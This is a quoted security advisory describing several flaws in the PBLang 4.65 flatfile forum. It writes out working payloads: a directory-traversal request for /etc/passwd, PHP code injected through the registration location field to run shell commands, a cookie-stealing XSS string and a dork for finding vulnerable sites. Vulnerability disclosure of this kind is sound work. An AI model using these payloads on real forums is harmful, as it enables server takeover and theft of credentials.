my advisory: [quote] PBLang 4.65 (possibly prior versions) remote code execution / administrative credentials disclosure / system information disclosure / cross site scripting / path disclosure software: description: PBLang is a powerful flatfile Bulletin Board System. It combines many features of a professional board, but does not even require SQL support. It is completely based on text-file. site: http://pblang.drmartinus.de/ download: https://sourceforge.net/project/showfiles.php?group_id=62953 1) system disclosure: you can traverse directories and see any file (if not .php or .php3 etc.) and include any file on target system using ‘../’ chars and null byte (), example: http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd vulnerable code in setcookie.php: … 16 $usrname=$HTTP_GET_VARS['u']; 17 @include($dbpath.’/’.$usrname.’temp’); … 2) remote code execution: board stores data in files, when you register a [username] file without extension is created in /db/members directory, inside we have php code executed when you login, so in location field type: madrid”; system($HTTP_POST_VARS[cmd]); echo ” in /db/members/[username] file we have … $userlocation=”madrid”; system($HTTP_GET_VARS[cmd]); echo “”; … no way to access the script directly, /db/members is .htaccess protected and extra lines are deleted from files after you login, so you should make all in a POST request and re-register this is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum: http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure: you can see password hash of any user or admin sending the command: cat ./db/members/[username] 4) cross site scripting: register and in location field type: madrid”; echo “alert(document.cookie) then check this url: http://[target]/[path]/setcookie.php?u=[username] 5) path disclosure: http://[target]/[path]/setcookie.php?u= googledork: “Software PBLang” filetype:php rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it original advisory: http://rgod.altervista.org/pblang465.html [/quote]